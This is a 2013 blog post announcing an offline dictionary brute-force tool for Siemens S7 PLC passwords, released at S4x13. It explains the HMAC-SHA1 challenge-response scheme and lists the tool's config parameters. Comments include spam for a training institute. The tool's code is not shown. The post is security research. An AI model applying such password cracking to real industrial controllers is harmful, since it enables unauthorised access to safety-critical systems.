Wednesday, January 16, 2013

S4x13 Releases: S7 password offline bruteforce tool

As you know S7 protocol, used to communication between Engineering Stations, SCADA, HMI and PLC can be protected by password.

On-line authentication is a simple challenge-response protocol.
  • Password hashed (SHA1) on client (TIA Portal)
  • Server (PLC) provide 20 byte challenge
  • Client calculate HMAC-SHA1(challenge, SHA1(password) as response

Enjoy our special S4x13 release by Alexander Timorin, Dmitry Sklyarov
Parameters are hardcoded, sorry.
cfg_pcap_file = 'path to .pcap file'
cfg_dictionary_file = 'path to dictionary file'

Feel free to contribute.


  1. Can the original PCAP be made available as well?

  2. Follow ups:


  3. Hello
    I question whether it is possible to read the password from the ET 200 SP CPU1512SP-1PN
    I have files .pcap
    I send to email.


  5. DIAC is a pioneer institute for providing Industrial Automation Training on PLC, SCADA, HMI, Automation, DCS, Motor Drives, Panel Design with 100% placement assistance.More @+91 9310096831 or Visit us

  6. PLC, HMI Training in Delhi, Noida | HMI Training Noida @9310096831
    HMI Training Provider in India by DIAC. Industrial automation training in Noida deliver by DIAC Corporate trainers with 100% placement assistance.
    hmi training in delhi, hmi training institute in delhi, hmi training center in delhi, hmi training and placement in delhi, best hmi training in delhi, hmi noida.